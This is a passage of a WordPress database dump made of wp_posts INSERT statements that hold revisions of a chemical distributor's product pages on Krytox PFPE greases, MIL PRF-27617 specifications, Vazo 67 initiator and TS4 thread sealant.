grease in a rolling bearing. The DN value is the inner race i.d. in millimeters multiplied by the RPM. DN values of 100,000 to 400,000 and higher have been achieved at temperatures of 204 °C to 260 °C (400°F to 500 °F) in actual field service using Krytox greases. At very high speeds, a special break-in run might be needed to spread the grease to avoid overheating.\r\n\r\nThe speed factor is affected by the base oil type, in addition to viscosity and thickener type, and is a measure of the lubricant’s internal friction. The limiting speed for grease-lubricated rolling bearings is dependent\r\non the type of bearing, its load, speed, precision, and lubrication system.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For help with applications please click here.</a>', 'How to Prepare Bearings with Krytox Lubricants', '', 'inherit', 'closed', 'closed', '', '2507-revision-v1', '', '', '2016-10-12 13:52:44', '2016-10-12 13:52:44', '', 2507, 'https://www.miller-stephenson.com/2507-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2551, 3, '2017-06-05 13:09:42', '2017-06-05 13:09:42', '<h2>VAZO 67 | 2,2’-Azodi(2-methylbutyronitrile)</h2>\n<h3>High Sol</h3>\nVazo 67 radical initiator, also known as AMBN 2,2’-Azodi(2-methylbutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 67 has similar thermal characteristics to Vazo 64, with the advantages of a safer decomposition product and higher solubility in a broader range of organic solvents.  Can be used as a drop-in for AIBN initiator and it will decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity, its relatively low molecular weight allows it to be one of the most cost effective options.   Benefits include:\n<ul>\n 	<li>Highest solubility in  solvents or monomers</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization: Low Polydispersity</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\n\nAll the grades are Vazo radical azo Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 radical initiator is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\n\n<ul>\n 	<li>\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\n 	<li>\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\n 	<li>\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\n 	<li>\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\n 	<li>\n<div>Are available in four grades to use over a wide temperature range.</div></li>\n</ul>\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 67 | 2,2’-Azodi(2-methylbutyronitrile)', 'Vazo 67, also known as AMBN 2,2’-Azodi(2-methylbutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 67 has similar thermal characteristics to Vazo 64, with the advantages of a safer decomposition product and higher solubility in a broader range of organic solvents. Can be used as a drop-in for AIBN initiator and it will decomposes to generate free radicals and nitrogen gas.   Benefits include:\n<ul>\n 	<li>Highest solubility in  solvents or monomers</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization: Low Polydispersity</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '575-autosave-v1', '', '', '2017-06-05 13:09:42', '2017-06-05 13:09:42', '', 575, 'https://www.miller-stephenson.com/575-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2552, 2, '2016-10-12 15:28:36', '2016-10-12 15:28:36', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'publish', 'closed', 'closed', '', 'mil-prf-27617-greases', '', '', '2016-10-12 19:49:44', '2016-10-12 19:49:44', '', 0, 'https://www.miller-stephenson.com/?p=2552', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2553, 2, '2016-10-12 15:03:14', '2016-10-12 15:03:14', '', 'MIL PRF-27617 Greases', '', 'inherit', 'closed', 'closed', '', 'shutterstock_405633937', '', '', '2016-10-12 15:03:26', '2016-10-12 15:03:26', '', 2552, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_405633937.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2554, 2, '2016-10-12 15:25:07', '2016-10-12 15:25:07', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<strong>Recommended Product:</strong>\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox TS4" ]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-12 15:25:07', '2016-10-12 15:25:07', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2555, 2, '2016-10-12 15:25:44', '2016-10-12 15:25:44', '<p><strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong></p>\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\n<p>https://www.youtube.com/watch?v=XxJbQOWtIG0</p>\n<p><strong>Key Benefits of Kytox™ TS4:</strong></p>\n<ul>\n<li>Can be re-applied over existing Kytox™ thread sealant</li>\n<li>Clings and will not shred or tear on assembly/disassembly</li>\n<li>Cannot plug or restrict critical piping, valves or instruments</li>\n<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\n<li>Compatible with most seal, O-ring and valve polymers</li>\n<li>No VOC content or hydrocarbon</li>\n<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\n<li>Cost-effective- only a small amount of sealant needed</li>\n<li>Fast and easy to apply</li>\n</ul>\n<p><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></p>\n<ul>\n<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\n<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\n<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\n<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\n</ul>\n<p><strong>Recommended Product:</strong></p>\n[ux_product_categories ids="165" number="10"]\n\n<p>To learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a></p>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-12 15:25:44', '2016-10-12 15:25:44', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2556, 2, '2016-10-12 15:26:29', '2016-10-12 15:26:29', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<strong>Recommended Product:</strong>\r\n\r\n[ux_product_categories ids="165" number="10"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-12 15:26:29', '2016-10-12 15:26:29', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2557, 2, '2016-10-12 15:26:52', '2016-10-12 15:26:52', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<strong>Recommended Product:</strong>\r\n\r\n[ux_product_categories ids="165" number="10"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-12 15:26:52', '2016-10-12 15:26:52', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2558, 2, '2016-10-12 15:28:36', '2016-10-12 15:28:36', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing 